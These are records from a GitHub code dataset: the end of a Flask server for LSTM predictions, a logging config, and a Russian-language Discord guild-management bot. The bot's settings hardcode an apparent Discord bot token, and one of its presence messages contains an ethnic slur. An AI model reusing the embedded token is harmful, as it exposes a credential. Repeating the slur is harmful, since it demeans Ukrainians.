getPrediction(examDescription=orderdata_json['examDescription'],OtherSX=orderdata_json['OtherSX'],OtherHX=orderdata_json['OtherHX'],OtherSX2=orderdata_json['OtherSX2'],indicationDescription=orderdata_json['indicationDescription'])\n #prediction = getPrediction(examDescription=orderdata_json['examDescription'],OtherSX=orderdata_json['OtherSX'],OtherSX2=orderdata_json,OtherHX=orderdata_json['OtherHX'],indicationDescription=orderdata_json['indicationDescription'])\n responses = jsonify({\"prediction\":prediction, \"model_version\": model_version})\n responses.status_code = 200\n return(responses)\n\nclass PredictionForm(FlaskForm):\n examDescription = StringField('examDescription', validators=[Required()])\n OtherHX = StringField('OtherHX', validators=[Required()])\n OtherSX = StringField('OtherSX', validators=[Required()])\n OtherSX2 = StringField('OtherSX2', validators=[Required()])\n indicationDescription = StringField('indicationDescription', validators=[Required()])\n #prediction = StringField('prediction', validators=[Required()])\n submit = SubmitField('Submit')\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n name = None\n form = PredictionForm()\n if form.validate_on_submit():\n old_examDescription = session.get('examDescription')\n old_OtherHX = session.get('OtherHX')\n old_OtherSX = session.get('OtherSX')\n old_OtherSX2 = session.get('OtherSX2')\n old_indicationDescription = session.get('indicationDescription')\n if (old_examDescription is not None and old_examDescription != form.examDescription.data) or (old_OtherSX2 is not None and old_OtherSX2 != form.OtherSX2.data) or (old_OtherSX is not None and old_OtherSX != form.OtherSX.data) or (old_indicationDescription is not None and old_indicationDescription != form.indicationDescription) or (old_OtherHX is not None and old_OtherHX != form.OtherHX.data) :\n flash('data has changed, predicting')\n\n session['examDescription'] = form.examDescription.data\n session['OtherHX'] = form.OtherHX.data\n session['OtherSX'] = form.OtherSX.data\n session['OtherSX2'] = form.OtherSX2.data\n session['indicationDescription'] = form.indicationDescription.data\n session['prediction'] = getPrediction(examDescription=form.examDescription.data,OtherHX=form.OtherHX.data,OtherSX=form.OtherSX.data,OtherSX2=form.OtherSX2.data,indicationDescription=form.indicationDescription.data)\n #form.examDescription.data = ''\n #form.OtherSX.data = ''\n #form.indicationDescription.data = ''\n return redirect(url_for('index'))\n #return render_template('index.html', form=form, examDescription=session.get('examDescription'), OtherSX=session.get('OtherSX'), indicationDescription=session.get('indicationDescription'),prediction=session.get('prediction'))\n return render_template('index.html', form=form, examDescription=session.get('examDescription'),OtherHX=session.get('OtherHX'),OtherSX=session.get('OtherSX'), OtherSX2=session.get('OtherSX2'), indicationDescription=session.get('indicationDescription'),prediction=session.get('prediction'))\n\nif __name__ == \"__main__\":\n print((\"* Loading Keras model and Flask starting server...please wait until server has fully started\"))\n files = glob.glob('data/*_data')\n files.sort(reverse=True)\n try:\n if len(files) > 0:\n print(\"Loading Pickle : \" + files[0] + \"/\" + files[0].replace('data/','') + \"_tokenizer_combined.pickle\")\n with open(files[0] + '/' + files[0].replace('data/','') + '_tokenizer_combined.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n print(tokenizer)\n except Exception as e:\n print('Could not open tokenizer')\n raise e\n graph = tf.get_default_graph()\n try:\n if len(files) > 0:\n print(\"Loading LSTM Model : \" + files[0] + \"/\" + files[0].replace('data/','') + \"_combined.h5\")\n lstm_model = load_model(files[0] + '/' + files[0].replace('data/','') + '_combined.h5')\n model_version = \"ml_postproc_lstm_\" + files[0].replace('data/','')\n except Exception as e:\n print('Could not open lstm_model')\n raise e\n \"\"\"\n try:\n with open('../tokenizer_examDescription_OtherSX_OtherHX_indicationDescription.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n except Exception as e:\n print('Could not open tokenizer')\n raise e\n graph = tf.get_default_graph()\n try:\n #lstm_model = load_model('../lstm_only_examDescription_OtherSX_indicationDescription.h5')\n lstm_model = load_model('../lstm_examDescription_OtherSX_OtherHX_indicationDescription.h5')\n except Exception as e:\n print('Could not open lstm_model')\n raise e\n \"\"\"\n app.run(host=\"0.0.0.0\",port=8484,threaded=True)\n","repo_name":"kurtteichman/rsna_lstm_retrain","sub_path":"flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38290179820","text":"\"\"\"\n sct_logging.py\n -------\n Logger setup script\n\"\"\"\n\nlogger_conf_dict = {\n \"version\": 1,\n \"formatters\": {\n \"default\": {\n \"format\": \"[%(asctime)s] %(module)s ( %(funcName)s ): %(levelname)s : %(message)s\",\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"stream\": \"ext://sys.stdout\",\n \"formatter\": \"default\",\n }\n },\n \"root\": {\"level\": \"INFO\", \"handlers\": [\"console\"]},\n }\n","repo_name":"sankamuk/SimplyPythonCrudTool","sub_path":"app/utilities/sct_logging.py","file_name":"sct_logging.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12220106756","text":"# imports\nimport asyncio\nimport datetime as dt\nimport json\nimport os\nimport random\nimport re\nimport secrets\nfrom asyncio import TimeoutError\nfrom datetime import datetime\nimport loguru\nimport nextcord\nimport nextcord as discord\n# from imports\nfrom nextcord.ext import commands as com, tasks\nfrom nextcord.ext.commands.errors import MissingPermissions, BotMissingPermissions\n\nfrom slavebot.ext import models\nfrom utils import GuildDefense\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nLOGGER = loguru.logger\n\nONE_DAY_IN_SECONDS = (60 * 60 * 24)\n\nGUILDS = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\nsettings = {\n\t'pre': \"+\",\n\t'token': \"ODYxNjI2NDA1MzEzNzA4MDYy.YOMiHw.2xTxozTjeP6xan0sByy_8XaBRLc\",\n\t\"bot\": \"SlaveBot#5164\",\n\t\"user_id\": \"861626405313708062\",\n\t\"ag_ci\": 929059781245808700,\n\t\"bi_ci\": 929059926641356850\n}\n\n# bot object\nbot = com.Bot(shard_count=2, command_prefix=com.when_mentioned_or(f\"{settings['pre']}\"), intents=discord.Intents.all())\nbot.remove_command(name=\"help\")\nstandard_color = discord.Color.from_rgb(80, 141, 234)\n\nDEBUG = True\n\n\n# on-ready functions\n@bot.event\nasync def on_ready():\n\tdef upd_invites():\n\t\tinvites_json = {\n\t\t\t\"invites_numbers\": 0,\n\t\t\t\"ids_list\": [],\n\t\t}\n\n\t\twith open('additional_files/invites.json', \"w\", encoding=\"UTF-8\") as invites_file_w:\n\t\t\tjson.dump(invites_json, invites_file_w, indent=4)\n\n\t\twith open(\"additional_files/users_cooldown.json\", \"w\", encoding=\"UTF-8\") as cooldown_file_w:\n\t\t\tjson.dump({}, cooldown_file_w, indent=4)\n\n\tupd_invites()\n\n\tserver = bot.get_guild(794987714310045727)\n\n\tchat = server.get_channel(929059781245808700)\n\n\tif DEBUG is False:\n\t\tst = await chat.history(limit=500).flatten()\n\t\tfor msg in st:\n\t\t\ttry:\n\t\t\t\tawait msg.delete()\n\t\t\t\tLOGGER.debug(\n\t\t\t\t\t\"One message was deleted\"\n\t\t\t\t)\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(\n\t\t\t\t\tf\"Error in message clearing\\n{exc}\"\n\t\t\t\t)\n\n\t\tawait update_the_database()\n\t\tawait update_the_messages()\n\n\t\tUpdateTask.start()\n\n\tUpdatePresence.start()\n\n\t# Каждое реальное изменение +1 в первую цифру каждая команда +1 во вторую каждый баг фикс +1 в третью\n\tdef version(big, medium, small) -> str:\n\t\treturn \".\".join([str(big), str(medium), str(small)])\n\n\tLOGGER.info(\"I-i-i am in the {} body! version {}\".format(bot.user, version(1, 2, 5)))\n\tLOGGER.info(\"Now ping is {}\".format(bot.latency))\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n\tif isinstance(error, com.MaxConcurrencyReached):\n\t\tembed = discord.Embed(title=\"Уупс...\", description=\"потише, мальчик(или вуман), я запрещаю спамить эту команду.\", color=discord.Color.red())\n\t\tawait ctx.reply(embed=embed, view=models.NonBts(), delete_after=3.5)\n\t\tawait ctx.message.add_reaction('❌')\n\telse:\n\t\tLOGGER.warning(\n\t\t\tf\"something went wrong, but we don't saying it to users. \\n\\n\\nError: \\n{error}\\n\"\n\t\t)\n\n\n@tasks.loop(minutes=5)\nasync def UpdatePresence():\n\tc = 0\n\tfor g in bot.guilds:\n\t\tc += len(g.members)\n\n\tLOGGER.info(\n\t\t\"Presence was started\"\n\t)\n\tpresences = [\"подслушивает {count} разговоров...\".format(count=round(int(c) / random.randint(2, 4), 0)), \"Ваши крики о помощи...\", \"Опенинг Клинка Рассекающего демонов!\", \"Советы от недалёких \"\n\t \"людей.\",\n\t \"Мурлыканье Вики\",\n\t \"Стоны Яты\",\n\t \"Хохлятский совет\"]\n\tfor p in presences:\n\t\tawait bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=str(p)))\n\t\tawait asyncio.sleep(60)\n\n\tUpdatePresence.restart()\n\n\nasync def update_the_database():\n\tasync def get_Gmaster(guild):\n\n\t\tguild_master_role_id = models.get_tag_value(\"TIME_ROLE\", f\"guild-master_{guild}\")\n\n\t\tguild_master_role = server.get_role(guild_master_role_id)\n\t\ttry:\n\t\t\tguild_master_user = guild_master_role.members[0]\n\t\texcept Exception as e:\n\t\t\tLOGGER.error(f\"ОШИБКА В get_Gmaster в НЕ НАЙДЕН ГМ {guild}, ПОДСТАВЛЕН АВАКУСУ\"\n\t\t\t f\"! \\n\" + str(e))\n\n\t\t\tguild_master_user = await server.fetch_member(361198710551740428)\n\t\treturn {\"role\": guild_master_role, \"user\": guild_master_user}\n\n\tdef get_channel(guild):\n\t\treturn server.get_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild}\"))\n\n\tasync def get_users_count(guild):\n\t\tserver = await bot.fetch_guild(794987714310045727)\n\t\tguild_role = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = server.get_role(guild_role)\n\t\tcount = len(guild_role.members)\n\n\t\treturn count\n\n\tserver = bot.get_guild(794987714310045727)\n\tguilds = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\tfor guild in guilds:\n\t\tLOGGER.info(f\"[INFO] UPDATING {guild.upper()} GUILD\")\n\t\tgm_and_role = await get_Gmaster(guild)\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"users\", new_value=await get_users_count(guild))\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"guild_president\", new_value=gm_and_role[\"user\"].id)\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"guild_chat_description\", new_value=get_channel(guild).topic)\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"guild_master_role\", new_value=gm_and_role[\"role\"].id)\n\t\tmodels.change_tag_in_type(\"GUILD\", f\"guild_{guild}\", fill=gm_and_role[\"user\"].id)\n\t\tLOGGER.info(f\"[INFO] UPDATED {guild.upper()} GUILD\")\n\n\tLOGGER.success(\"UPDATED THE DATABASE\")\n\n\nasync def update_the_messages():\n\tglobal vars\n\n\tasync def get_color(guild, server):\n\t\tif guild == \"Dendro\":\n\t\t\treturn [discord.Color.from_rgb(60, 173, 79), await server.fetch_emoji(868084062668095549)]\n\n\t\telif guild == \"Anemo\":\n\t\t\treturn [discord.Color.from_rgb(102, 205, 170), await server.fetch_emoji(868084061510463538)]\n\n\t\telif guild == \"Hydro\":\n\t\t\treturn [discord.Color.from_rgb(154, 176, 229), await server.fetch_emoji(868084062693236827)]\n\n\t\telif guild == \"Pyro\":\n\t\t\treturn [discord.Color.from_rgb(204, 47, 47), await server.fetch_emoji(868083783457443860)]\n\n\t\telif guild == \"Cryo\":\n\t\t\treturn [discord.Color.from_rgb(0, 252, 255), await server.fetch_emoji(868084061929877594)]\n\n\t\telif guild == \"Electro\":\n\t\t\treturn [discord.Color.from_rgb(103, 88, 182), await server.fetch_emoji(868084063142035466)]\n\n\t\telif guild == \"Geo\":\n\t\t\treturn [discord.Color.from_rgb(255, 222, 60), await server.fetch_emoji(868084063003639889)]\n\n\t# 204, 47, 47 - страндарт цвет\n\n\tdef get_users_count(guild):\n\t\tguild_role = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = server.get_role(guild_role)\n\n\t\tcount = len(guild_role.members)\n\n\t\treturn count\n\n\tserver = bot.get_guild(794987714310045727)\n\n\tdef sort_dict(dict):\n\t\tsorted_dict = {i[0]: i[1] for i in sorted(dict.items(), key=lambda para: (para[1]))}\n\n\t\treturn sorted_dict\n\n\tguilds_list = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\tguilds_dict_by_users = {g: get_users_count(g) for g in guilds_list}\n\n\tguilds_dict_by_users_sorted = sort_dict(guilds_dict_by_users)\n\n\tchat = server.get_channel(929059781245808700)\n\n\t# def clean_text(text: str, list: list) -> str:\n\t# \tres = text\n\t# \tfor i in list:\n\n\tfor guild in guilds_dict_by_users_sorted:\n\t\tcolor_and_emoji = await get_color(guild, server)\n\t\ttext = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"campaign_speech\")\n\n\t\tguild_master = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"guild_president\")\n\n\t\tguild_master = await server.fetch_member(guild_master)\n\n\t\tusers_count = get_users_count(guild)\n\t\t# speech = re.sub(\"\\s*\\}\", \"}\", text)\n\t\t# speech = re.sub(\"{\\s*\", \"{\", speech)\n\t\t#\n\t\t# formatted_speech = speech\n\t\t#\n\t\t# vars: Dict = {\"guild_name\": guild,\n\t\t# \"users_count\": users_count,\n\t\t# \"awakusu\": \"<@!361198710551740428>\",\n\t\t# \"master\": f\"{guild_master.mention}\"}\n\t\t#\n\t\t# try:\n\t\t# \tformatted_speech = speech.format(**vars)\n\t\t# except (\n\t\t# \t\tKeyError\n\t\t# ):\n\t\t# \tLOGGER.warning(\"В речи несуществующая переменная, удали пж\")\n\t\t# except Exception:\n\t\t# \tLOGGER.error(\"Ошибка редактирования речи!\")\n\n\t\tembed = discord.Embed(title=f\"{color_and_emoji[1]}{guild} **гильдия**!{color_and_emoji[1]}\",\n\t\t description=f\"**{color_and_emoji[1]} Кол-во участников**: {users_count}{color_and_emoji[1]}\\n\"\n\t\t f\"**{color_and_emoji[1]} Глава гильдии**: {guild_master.mention}{color_and_emoji[1]}\\n\"\n\t\t f\"\\n\\n\\n\\n\"\n\t\t f\"**{color_and_emoji[1]} Агитационная речь главы гильдии**:\\n\\n\"\n\t\t f\"{text}\", color=color_and_emoji[0])\n\n\t\tembed = models.embed_stan(embed)\n\n\t\tmessage = await chat.send(embed=embed)\n\t\tawait message.add_reaction(color_and_emoji[1])\n\n\tserver = bot.get_guild(794987714310045727)\n\tchat = await server.fetch_channel(settings[\"ag_ci\"])\n\tbts = models.GuildView(bot=bot)\n\n\tembed_start = discord.Embed(\n\t\ttitle=\"Итак вы прочли агитации...\",\n\t\tdescription=\"```diff\\n-��сли вы не прочли агитации - настоятельно рекомендую это сделать```\\n\\n\\n\\nИтак вы прочли агитации: \\n\\n**__1)__ выберите гильдию из 7 доступных**\\n**__2)__ нажмите на \"\n\t\t \"одну из кнопок ниже(на ту, на которой имя понравившейся вам гильдии)** \\n**__3)__ заполните заявку, это не возьмёт много времени.** \\n\\n\\n```diff\\n-ПРИМЕЧАНИЕ! рекомендую при \"\n\t\t \"составлении заявки писать реальные вещи и ничего не выдумывать, а ещё лучше подготовится: (Возраст, причина вступить в гильдию, Любимые персонажи Геншина).```\",\n\t\tcolor=standard_color)\n\n\tawait chat.send(embed=embed_start, view=bts)\n\n\n@tasks.loop(seconds=0.00001)\nasync def UpdateTask():\n\tisrael_tz = dt.timezone(offset=dt.timedelta(hours=2), name=\"UTC\")\n\tdt_now = dt.datetime.now(tz=israel_tz)\n\n\ttime_m = datetime(year=dt_now.year, month=dt_now.month, day=dt_now.day, hour=5, minute=00, second=00, microsecond=000000)\n\ttime_e = datetime(year=dt_now.year, month=dt_now.month, day=dt_now.day, hour=17, minute=00, second=00, microsecond=000000)\n\n\tnow = datetime(year=dt_now.year, month=dt_now.month, day=dt_now.day, hour=dt_now.hour, minute=dt_now.minute, second=dt_now.second, microsecond=00)\n\n\tif time_m == now:\n\n\t\tserver = bot.get_guild(794987714310045727)\n\n\t\tchat = server.get_channel(929059781245808700)\n\n\t\tst = await chat.history(limit=500).flatten()\n\t\tfor msg in st:\n\t\t\ttry:\n\t\t\t\tawait msg.delete()\n\t\t\t\tLOGGER.debug(\n\t\t\t\t\t\"One message was deleted\"\n\t\t\t\t)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(exc)\n\t\tawait chat.purge(limit=100)\n\n\t\tawait update_the_database()\n\t\tawait update_the_messages()\n\n\telif time_e == now:\n\n\t\tserver = bot.get_guild(794987714310045727)\n\n\t\tchat = server.get_channel(929059781245808700)\n\n\t\tst = await chat.history(limit=500).flatten()\n\t\tfor msg in st:\n\t\t\ttry:\n\t\t\t\tawait msg.delete()\n\t\t\t\tLOGGER.debug(\n\t\t\t\t\t\"One message was deleted\"\n\t\t\t\t)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(\n\t\t\t\t\tf\"Error in message clearing\\n{exc}\"\n\t\t\t\t)\n\n\t\tawait update_the_database()\n\t\tawait update_the_messages()\n\n\telse:\n\t\tpass\n\n\n@bot.command(name='пинг', aliases=[\"латентность\", \"ping\"])\n@com.cooldown(1, 5, com.BucketType.user)\nasync def ping(ctx):\n\ttry:\n\t\tdef dur(ping: float):\n\t\t\tif ping <= 5:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Идеально.\"\n\n\t\t\telif ping >= 5 and ping < 10:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Хорошо.\"\n\n\t\t\telif ping >= 10 and ping < 20:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Нормально.\"\n\n\t\t\telif ping >= 20 and ping < 30:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Средне.\"\n\n\t\t\telif ping >= 30:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Плохо.\"\n\n\t\tembed = discord.Embed(title=\"Текущая латентность!\", description=f\"**{dur(round(bot.latency, 2) * 100)}**\", color=standard_color)\n\t\tembed = models.embed_stan(embed)\n\t\tawait ctx.send(embed=embed)\n\texcept Exception as e:\n\t\tLOGGER.error(f\"Exception in latency command, {e}\")\n\n\n# Мэйн страница админки и уровни доступа к ней.\n\n# Main\nasync def main(ctx, msg=None):\n\tif await access_lvl(ctx) >= 1:\n\t\tapf = models.AdminPanelFunc(await ctx.guild.fetch_member(ctx.author.id))\n\t\tembed_admin_panel = discord.Embed(title='Админ-Панель;',\n\t\t description=\"Выберите функцию которую небходимо возпроизвести, у все функций разный уровень доступа.\",\n\t\t color=discord.Colour.from_rgb(80, 141, 234))\n\n\t\tembed_admin_panel.set_author(name=\"NEDOGUILD's-System\",\n\t\t icon_url=\"https://cdn.discordapp.com/attachments/845771501571539035/930127142367420447/250.png\")\n\n\t\tdt_string = str(datetime.now())\n\n\t\tembed_admin_panel.set_footer(text=f\"{dt_string[:-10]}\")\n\n\t\tif msg is None:\n\t\t\tmsg_ap = await ctx.send(embed_admin_panel, view=apf)\n\t\telse:\n\t\t\tmsg_ap = await msg.edit(embed=embed_admin_panel, view=apf)\n\n\t\tawait apf.wait()\n\n\t\tif apf.Func is None:\n\t\t\tawait msg_ap.delete()\n\n\t\telif apf.Func == \"FUNC:JSON\":\n\t\t\tif int(await access_lvl(ctx)) >= 2:\n\t\t\t\tawait json_pan(ctx, msg_ap)\n\t\t\telse:\n\t\t\t\tawait msg_ap.edit(embed=discord.Embed(title=f'Недостаточный уровень доступа, для этой функции нужен 2 уровень доступа, ваш равен {await access_lvl(ctx)}.'))\n\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\tawait main(ctx, msg_ap)\n\telse:\n\t\tLOGGER.info(\"User haven't access to this command\")\n\n\n# Access\n\nasync def access_lvl(ctx=None, user_=None):\n\t# Три уровня доступа.\n\t# Первый - 0 - обычный юзер, без доступа в админку.\n\t# Второй - 1 - Гильд-Мастер, с доступом к некоторым функциям по управлению гильдией.\n\t# Третий - 2 - Ята, Авакусу и все смотрящие за гильдиями а также администрация, доступ ко всем функциям.\n\n\tuser = await ctx.guild.fetch_member(ctx.author.id) if user_ is None else user_\n\n\tif user.bot:\n\t\treturn 0\n\telse:\n\t\taccess_lvl_2 = []\n\t\taccess_lvl_1 = []\n\t\t# Получаем все роли первого и второго уровня из JSON'a\n\n\t\twith open(\"additional_files/config_file.json\", \"r\") as file:\n\t\t\tfile = json.load(file)\n\n\t\tfor role in file['TIME_ROLE']:\n\t\t\tif role.startswith('guild-vision'):\n\t\t\t\taccess_lvl_2.append(file['TIME_ROLE'][role])\n\t\t\telse:\n\t\t\t\tif role.startswith('guild-master'):\n\t\t\t\t\taccess_lvl_1.append(file['TIME_ROLE'][role])\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t# ----------------------------------------------------------------\n\n\t\t# Проверяем есть ли роли первого и второго уровня у юзера.\n\t\ttry:\n\t\t\tif user.guild_permissions.administrator:\n\t\t\t\treturn 2\n\n\t\t\tif user.id == 686207718822117463:\n\t\t\t\treturn 2\n\n\t\texcept Exception:\n\t\t\treturn 0\n\n\n\t\telse:\n\t\t\tlvl_1 = 0\n\t\t\tlvl_2 = 0\n\n\t\t\tfor role in access_lvl_1:\n\t\t\t\tfor role_ in user.roles:\n\t\t\t\t\tif role == role_.id:\n\t\t\t\t\t\tlvl_1 += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tfor role in access_lvl_2:\n\t\t\t\tfor role_ in user.roles:\n\t\t\t\t\tif role == role_.id:\n\t\t\t\t\t\tlvl_2 += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif lvl_1 == 0 and lvl_2 == 0:\n\t\t\t\treturn 0\n\n\t\t\tif lvl_1 > lvl_2:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\tif lvl_2 > lvl_1:\n\t\t\t\t\treturn 2\n\t\t\t\telse:\n\t\t\t\t\tif lvl_1 == lvl_2:\n\t\t\t\t\t\treturn 2\n\n\n# -----------------------------------------------------------------------------\n\n# JSON раздел админки\n\nasync def last_page(str_name_last_page: str, ctx, msg):\n\tif str_name_last_page == \"ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"ROLE\")\n\telif str_name_last_page == \"CHANNEL\":\n\t\tawait json_type_pan(ctx, msg, \"CHANNEL\")\n\telif str_name_last_page == \"TIME_ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"TIME_ROLE\")\n\telif str_name_last_page == \"GUILD\":\n\t\tawait json_type_pan(ctx, msg, \"GUILD\")\n\telse:\n\t\tawait main(ctx, msg)\n\n\nasync def json_pan(ctx, msg):\n\tbtc = models.Type(await ctx.guild.fetch_member(ctx.author.id))\n\tembed_type_chose = discord.Embed(title=\"Админ-Панель: JSON;\",\n\t description=\"Какой раздел в базе-данных надо отредактировать?\",\n\t color=discord.Colour.from_rgb(80, 141, 234))\n\n\tembed_type_chose.set_author(name=\"NEDOGUILD's-System\",\n\t icon_url=\"https://cdn.discordapp.com/attachments/845771501571539035/930127142367420447/250.png\")\n\n\tdt_string = str(datetime.now())\n\n\tembed_type_chose.set_footer(text=f\"{dt_string[:-10]}\")\n\n\tawait msg.edit(embed=embed_type_chose, view=btc)\n\n\tawait btc.wait()\n\n\tres = btc.Type\n\n\tif res == \"BACK\":\n\t\tawait main(ctx=ctx, msg=msg)\n\n\telif res == \"ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"ROLE\")\n\telif res == \"CHANNEL\":\n\t\tawait json_type_pan(ctx, msg, \"CHANNEL\")\n\telif res == \"TIME_ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"TIME_ROLE\")\n\telif res == \"GUILD\":\n\t\tawait json_type_pan(ctx, msg, \"GUILD\")\n\telse:\n\t\tif res == \"STOP\" or res is None:\n\t\t\tawait msg.delete()\n\n\nasync def edit_json_type(ctx, msg, type):\n\tdef check(msg):\n\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\tembed_please_give_me_a_tag = discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Tag;\",\n\t description=\"Введите Tag который надо изменить. Вводите тег с соблюдением всех символов и правильным размером символов.\", )\n\n\tembed_please_give_me_a_tag = models.embed_stan(embed=embed_please_give_me_a_tag)\n\n\tembed_please_give_me_a_fill = discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Fill;\", description=\"Введите новое значение.\")\n\n\tembed_please_give_me_a_fill = models.embed_stan(embed_please_give_me_a_fill)\n\n\t#\n\t#\n\t#\n\n\tembed_time_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\", description=\"Вы не дали ответ, возвращаю вас на прежнюю страницу.\"))\n\n\tembed_none_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\",\n\t description=\"Такого значения нет в базе данных, возвращаю вас на прежнюю страницу.\"))\n\n\tawait msg.edit(embed=embed_please_give_me_a_tag, view=models.NonBts())\n\ttry:\n\t\ttag = await bot.wait_for(\"message\", check=check, timeout=20)\n\texcept TimeoutError:\n\t\tawait msg.edit(embed=embed_time_err, view=models.NonBts())\n\t\tawait asyncio.sleep(2.5)\n\t\tawait last_page(type, ctx, msg)\n\telse:\n\t\tche = models.check_tag_in_type(type=type, tag=tag.content)\n\t\tawait tag.delete()\n\t\tif che is None:\n\t\t\tawait msg.edit(embed=embed_none_err, view=models.NonBts())\n\t\t\tawait asyncio.sleep(2.5)\n\t\t\tawait last_page(type, ctx, msg)\n\t\telse:\n\t\t\tif che is True:\n\t\t\t\ttry:\n\t\t\t\t\tawait msg.edit(embed=embed_please_give_me_a_fill, view=models.NonBts())\n\t\t\t\t\tfill = await bot.wait_for(\"message\", check=check, timeout=20)\n\t\t\t\texcept TimeoutError:\n\t\t\t\t\tawait msg.edit(embed=embed_time_err, view=models.NonBts())\n\t\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\t\t\t\telse:\n\t\t\t\t\tawait fill.delete()\n\t\t\t\t\tmodels.change_tag_in_type(type, tag.content, fill.content)\n\t\t\t\t\tawait msg.edit(embed=models.embed_stan(embed=discord.Embed(title=f'Админ-Панель: JSON: {type}: Edit: Success;', color=discord.Colour.from_rgb(80, 141, 234))), view=models.NonBts())\n\t\t\t\t\tawait asyncio.sleep(1.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\n\nasync def add_json_to_type(ctx, msg, type):\n\tdef check(msg):\n\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\tembed_add_tag_give_me = discord.Embed(\n\t\ttitle=f\"Админ-Панель: JSON: {type}: Add: Tag;\",\n\t\tdescription=f\"Напишите в чат название тега который надо добавить, он должен начинатся с {type.lower()}.\"\n\t\t f\"\\n\\nНапример: {type.lower()}_DendroRole\", color=discord.Colour.from_rgb(80, 141, 234))\n\n\tembed_add_fill_give_me = discord.Embed(\n\t\ttitle=f\"Админ-Панель: JSON: {type}: Add: fill;\",\n\t\tdescription=f\"Напишите в чат значение для этого тега, оно не должно содержать буквы или другие символы. **Только цифры**\\n\\nНапример: 123\", color=discord.Colour.from_rgb(80, 141, 234))\n\n\tembed_add_fill_give_me = models.embed_stan(embed_add_fill_give_me)\n\n\tembed_time_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Add: Error;\",\n\t description=\"Вы не дали ответ, возвращаю вас на прежнюю страницу.\"))\n\n\tembed_true_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Add: Error;\",\n\t description=\"Такой тег уже записан в базу данных, невозможно иметь два одинаковых тега.\", color=discord.Colour.from_rgb(80, 141, 234)))\n\n\tembed_add_tag_give_me = models.embed_stan(embed_add_tag_give_me)\n\n\tadd_tag = models.change_tag_in_type\n\n\tawait msg.edit(embed=embed_add_tag_give_me, view=models.NonBts())\n\ttry:\n\t\ttagN = await bot.wait_for(\"message\", check=check, timeout=30)\n\texcept TimeoutError:\n\t\tawait msg.edit(embed=embed_time_err)\n\t\tawait asyncio.sleep(2.5)\n\t\tawait last_page(type, ctx, msg)\n\telse:\n\t\tche = models.check_tag_in_type(type, tagN.content)\n\t\tif che is True:\n\t\t\tawait msg.edit(embed=embed_true_err, view=models.NonBts())\n\t\t\tawait asyncio.sleep(2.5)\n\t\t\tawait last_page(type, ctx, msg)\n\t\telse:\n\t\t\tif che is None:\n\t\t\t\tawait msg.edit(embed=embed_add_fill_give_me, view=models.NonBts())\n\t\t\t\tawait tagN.delete()\n\t\t\t\ttry:\n\t\t\t\t\tfillN = await bot.wait_for(\"message\", check=check, timeout=30)\n\t\t\t\texcept TimeoutError:\n\t\t\t\t\tawait msg.edit(embed=embed_time_err)\n\t\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\t\t\t\telse:\n\t\t\t\t\tawait fillN.delete()\n\t\t\t\t\tadd_tag(type, tagN.content, fillN.content)\n\t\t\t\t\tawait msg.edit(embed=models.embed_stan(\n\t\t\t\t\t\tembed=discord.Embed(title=f'Админ-Панель: JSON: 